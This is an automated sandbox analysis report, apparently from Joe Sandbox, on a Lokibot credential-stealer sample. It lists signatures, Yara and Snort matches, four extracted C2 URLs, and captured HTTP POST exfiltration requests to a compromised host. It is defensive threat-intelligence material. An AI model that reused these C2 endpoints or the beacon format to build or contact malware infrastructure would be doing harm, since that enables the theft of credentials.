Loading ...

Play interactive tourEdit tour

Windows Analysis Report FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe

Overview

General Information

Sample Name:FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Analysis ID:525634
MD5:2ae5473d26a235b7ab3ee2d632514d60
SHA1:40cbf4bffbe3a0c691aaac5e51ab93764958e5b9
SHA256:fadae8a98643b8305b18d587f3cc16534eacd884e84753c92e1e64c3336d91c3
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe" MD5: 2AE5473D26A235B7AB3EE2D632514D60)
    • vbc.exe (PID: 7148 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 30 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x13280:$s2: https://
        • 0x16c74:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          4.0.vbc.exe.400000.5.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x13e80:$s2: https://
          • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 77 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeVirustotal: Detection: 63%Perma Link
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMetadefender: Detection: 54%Perma Link
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeReversingLabs: Detection: 75%
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeAvira: detected
          Multi AV Scanner detection for domain / URLShow sources
          Source: publicspeaking.co.idVirustotal: Detection: 8%Perma Link
          Source: http://publicspeaking.co.id/seun/Panel/five/fre.phpVirustotal: Detection: 5%Perma Link
          Machine Learning detection for sampleShow sources
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeJoe Sandbox ML: detected
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 216.239.36.21:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 216.239.34.21:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 216.239.34.21:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: global trafficHTTP traffic detected: POST /seun/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F3A57278Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /seun/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F3A57278Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /seun/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F3A57278Content-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /seun/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F3A57278Content-Length: 163Connection: close
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: https://publicspeaking.co.id/seun/Panel/five/fre.php
          Source: unknownHTTP traffic detected: POST /seun/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F3A57278Content-Length: 190Connection: close
          Source: unknownDNS traffic detected: queries for: publicspeaking.co.id

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
